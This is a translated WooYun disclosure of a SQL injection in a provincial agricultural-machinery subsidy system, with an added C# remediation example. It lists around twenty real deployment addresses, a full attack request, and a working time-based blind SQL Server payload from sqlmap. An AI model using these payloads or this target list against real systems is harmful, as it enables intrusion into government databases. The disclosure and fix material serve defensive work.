
Vulnerability summary

Defect ID: wooyun-2015-0104644

Vulnerability title: Generic SQL injection in a provincial-level system (affects provincial-level administrative regions nationwide)

Related vendor: 山西万鸿科技

Vulnerability author: 路人甲

Submitted: 2015-03-30 14:31

Fixed: 2015-06-29 09:40

Disclosed: 2015-06-29 09:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-03-30: Details reported to the vendor, awaiting vendor handling
2015-03-31: Vendor confirmed; details disclosed to the vendor only
2015-04-03: Details opened to third-party security partners
2015-05-25: Details disclosed to core white hats and domain experts
2015-06-04: Details disclosed to regular white hats
2015-06-14: Details disclosed to intern white hats
2015-06-29: Details disclosed to the public

Brief description:

Generic SQL injection in a provincial-level system (affects provincial-level administrative regions nationwide)

Detailed description:

System name: Provincial Agricultural Machinery Purchase Subsidy Information Management System
Vendor: 山西万鸿科技
Vulnerable file: Application/Application/ToViewLog.aspx
Some instances:
http://202.75.221.11/zjnj2011/Application/Application/ToViewLog.aspx Zhejiang Province
http://218.94.30.9/Application/Application/ToViewLog.aspx Jiangsu Province
http://218.26.97.198/sx2014/Application/Application/ToViewLog.aspx Shanxi Province
http://59.61.92.123:12345/njbt2013/Application/Application/ToViewLog.aspx Fujian Province
http://218.77.183.70/njbt2013/Application/Application/ToViewLog.aspx Hainan Province
http://60.190.2.79/Njbt2013/Application/Application/ToViewLog.aspx Ningbo, Zhejiang
http://220.171.42.161/xjnj2013/Application/Application/ToViewLog.aspx Xinjiang
http://222.247.48.179:8000/Application/Application/ToViewLog.aspx Hunan Province
http://61.138.188.217/jl2013/Application/Application/ToViewLog.aspx Jilin Province
http://182.148.114.118/2013/Application/Application/ToViewLog.aspx Sichuan Province
http://amic.jxagri.gov.cn/nybgj2013/Application/Application/ToViewLog.aspx Jiangxi Province
http://113.140.74.6/sx2012/Application/Application/ToViewLog.aspx Shaanxi Province
http://218.7.20.102:9002/njbt2013/Application/Application/ToViewLog.aspx Heilongjiang Province
http://61.161.166.69:2013/Application/Application/ToViewLog.aspx Liaoning Province
http://njbt2012.gdnj.gov.cn/Application/Application/ToViewLog.aspx Guangdong Province
http://218.58.77.226/njgzbt2011/Application/Application/ToViewLog.aspx Shandong Province
http://218.201.202.239:8081/gznj2013/Application/Application/ToViewLog.aspx Guizhou Province
http://116.52.13.46/test2013/Application/Application/ToViewLog.aspx Yunnan Province
http://61.178.38.194/gsnjbt2012/Application/Application/ToViewLog.aspx Gansu Province
http://bt.ahnjh.gov.cn/2011/Application/Application/ToViewLog.aspx Anhui Province
and so on.
Vulnerability verification:
Taking http://218.77.183.70/njbt2013/Application/ToViewLog.aspx as an example:
Test request:

POST /njbt2013/Application/ToViewLog.aspx HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://218.77.183.70/njbt2013/Application/ToViewLog.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 1504
DNT: 1
Host: 218.77.183.70
Pragma: no-cache
Cookie: ASP.NET_SessionId=n0muyo55xc152m550bdkjk2r
__VIEWSTATE=%2FwEPDwUKMTkwMjcxMTQ5MA9kFgICAw9kFgICCQ88KwANAQAPFgYeCFBhZ2VTaXplAjIeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCBGQWAmYPZBYMAgEPZBYGZg8PFgIeBFRleHQFF%2BeUs%2Bivt%2BafpeivouWvvOWHukV4Y2VsZGQCAQ8PFgIfAwUSMjAxNS8zLzI1IDEwOjEyOjE3ZGQCAg8PFgIfAwVZ55yB55u06L6W5Y6%2F57qn6KGM5pS%2F5Y2V5L2N5piM5rGf6buO5peP6Ieq5rK75Y6%2F5Yac5py65bGAW%2BaYjOaxn%2Bm7juaXj%2BiHquayu%2BWOv%2BaTjeS9nOWRmF1kZAICD2QWBmYPDxYCHwMFF%2BeUs%2Bivt%2BafpeivouWvvOWHukV4Y2VsZGQCAQ8PFgIfAwURMjAxNS8zLzI1IDg6NDg6MzBkZAICDw8WAh8DBVnnnIHnm7Tovpbljr%2FnuqfooYzmlL%2FljZXkvY3mmIzmsZ%2Fpu47ml4%2Foh6rmsrvljr%2FlhpzmnLrlsYBb5piM5rGf6buO5peP6Ieq5rK75Y6%2F5pON5L2c5ZGYXWRkAgMPZBYGZg8PFgIfAwUX55Sz6K%2B35p%2Bl6K%2Bi5a%2B85Ye6RXhjZWxkZAIBDw8WAh8DBREyMDE1LzMvMTggODo0OTo1M2RkAgIPDxYCHwMFWeecgeebtOi%2BluWOv%2Be6p%2BihjOaUv%2BWNleS9jemZteawtOm7juaXj%2BiHquayu%2BWOv%2BWGnOacuuWxgFvpmbXmsLTpu47ml4%2Foh6rmsrvljr%2Fmk43kvZzlkZhdZGQCBA9kFgZmDw8WAh8DBR3kvIHkuJrplIDllK7mn6Xor6Llr7zlh7pFeGNlbGRkAgEPDxYCHwMFETIwMTUvMy83IDEwOjA2OjExZGQCAg8PFgIfAwU455Sf5Lqn5LyB5LiaW%2BW5v%2Bilv%2BmbhOmjnuacuuaisOWItumAoOaciemZkOi0o%2BS7u%2BWFrOWPuF1kZAIFDw8WAh4HVmlzaWJsZWhkZAIGDw8WAh8EZ2QWAmYPZBYCAgEPFgIfBGgWDgIBDw8WAh4HRW5hYmxlZGhkZAIDDw8WAh8FaGRkAgUPDxYCHwMFATFkZAIHDw8WAh8DBQExZGQCCQ8PFgIfBWhkZAILDw8WAh8FaGRkAg0PDxYCHwMFATFkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIQ2hrVGltZXMFCUdyaWRWaWV3MQ88KwAKAQgCAWRJ6RLhNzYz%2FzCSlb0C6W3GB67k3w%3D%3D&__VIEWSTATEGENERATOR=3D4F95D8&ChkTimes=on&textTimeGo=2015-03-03&textTimeEnd=2015-03-05&btnChaXun=%E6%9F%A5%E8%AF%A2


Verification result:

---
Place: POST
Parameter: textTimeGo
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: __VIEWSTATE=/wEPDwUKMTkwMjcxMTQ5MA9kFgICAw9kFgICCQ88KwANAQAPFgYeCFB
hZ2VTaXplAjIeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWQWAmYPZBYGAgEPZBYGZg8PFgIeBFR
leHQFBiZuYnNwO2RkAgEPDxYCHwMFBiZuYnNwO2RkAgIPDxYCHwMFBiZuYnNwO2RkAgIPDxYCHgdWaXN
pYmxlaGRkAgMPDxYCHwRoZBYCZg9kFgICAQ9kFg4CAQ8PFgIeB0VuYWJsZWRoZGQCAw8PFgIfBWhkZAI
FDw8WAh8DBQExZGQCBw8PFgIfAwUBMWRkAgkPDxYCHwVoZGQCCw8PFgIfBWhkZAINDw8WAh8DBQExZGQ
YAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCENoa1RpbWVzBQlHcmlkVmlldzEPPCs
ACgEIAgFk3kXAY6HsOuz1qVRNaKgzlDlpezI=&__VIEWSTATEGENERATOR=3D4F95D8&ChkTimes=on&
textTimeGo=2015-03-03' AND 6136=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers
AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysu
sers AS sys7) AND 'Erqr'='Erqr&textTimeEnd=2015-03-05&btnChaXun=%E6%9F%A5%E8%AF%
A2
---


[Screenshot: 1.png]

Proof of vulnerability:

As above.

Suggested fix:

Filter the input.

Copyright notice: please credit the source when reproducing: 路人甲@WooYun
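The fix section says only "filter". The sqlmap result above (time-based blind injection through the posted date field textTimeGo on an ASP.NET/SQL Server application) implies the posted date strings reach the query as text. As an added example, not code from this report or from 山西万鸿科技, here is a constructed C#/ADO.NET sketch of that vulnerable pattern beside a hardened version that first requires the field to parse strictly as a yyyy-MM-dd date and then binds it as a typed SqlParameter, so the value can never be interpreted as SQL. The table name ViewLog, the column LogTime, and all method names are assumptions made for the illustration.

```csharp
// Added example (not the vendor's code). Assumed schema: table ViewLog with a
// LogTime column; assumed form fields textTimeGo / textTimeEnd as on the page.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;

public static class ViewLogQuery
{
    // Constructed vulnerable pattern: the posted strings are concatenated
    // straight into the SQL text. A quote inside textTimeGo closes the
    // literal, and whatever follows is executed as SQL by the server.
    public static string BuildUnsafeSql(string textTimeGo, string textTimeEnd)
    {
        return "SELECT * FROM ViewLog WHERE LogTime >= '" + textTimeGo +
               "' AND LogTime < '" + textTimeEnd + "'";
    }

    // Hardened step 1: the field must be exactly a yyyy-MM-dd date.
    // Anything with a quote, a space or a SQL keyword fails here and the
    // request is rejected before the database is involved.
    public static bool TryParseDate(string input, out DateTime value)
    {
        return DateTime.TryParseExact(
            input, "yyyy-MM-dd", CultureInfo.InvariantCulture,
            DateTimeStyles.None, out value);
    }

    // Hardened step 2: even a valid date is bound as a typed parameter,
    // never spliced into the query text. Parameter values are sent
    // separately from the statement, so they cannot change its structure.
    public static SqlCommand BuildSafeCommand(SqlConnection conn,
                                              string textTimeGo,
                                              string textTimeEnd)
    {
        if (!TryParseDate(textTimeGo, out DateTime start) ||
            !TryParseDate(textTimeEnd, out DateTime end) ||
            end < start)
        {
            throw new ArgumentException(
                "date range must be two yyyy-MM-dd values with start <= end");
        }

        var cmd = new SqlCommand(
            "SELECT * FROM ViewLog WHERE LogTime >= @Start AND LogTime < @End",
            conn);
        cmd.Parameters.Add("@Start", SqlDbType.Date).Value = start;
        // End date is inclusive for the user, so query up to the next day.
        cmd.Parameters.Add("@End", SqlDbType.Date).Value = end.AddDays(1);
        return cmd;
    }

    public static void Main()
    {
        // A normal value passes validation; a value carrying a quote does not.
        Console.WriteLine(TryParseDate("2015-03-03", out _));   // True
        Console.WriteLine(TryParseDate("2015-03-03' AND 1=1", out _)); // False

        // With a real connection the hardened command would be used as:
        // using (var conn = new SqlConnection(connectionString))
        // using (var cmd = BuildSafeCommand(conn, "2015-03-03", "2015-03-05"))
        // {
        //     conn.Open();
        //     using (var reader = cmd.ExecuteReader()) { /* bind to GridView */ }
        // }
    }
}
```

Either layer alone would have stopped the reported injection; using both means a future change to the query (or a field that is not a date) does not quietly reintroduce the problem. Rejecting malformed dates with an explicit error also gives the application log a clean signal to alert on, which a time-based blind probe otherwise leaves almost no trace of.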


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-03-31 09:38

Vendor reply:

CNVD confirmed and reproduced the described situation. CNVD has notified the software vendor through the contact information published on its website, and has also forwarded the case via CNCERT to the corresponding branch center, which will coordinate handling with the site operator.

Latest status:

None yet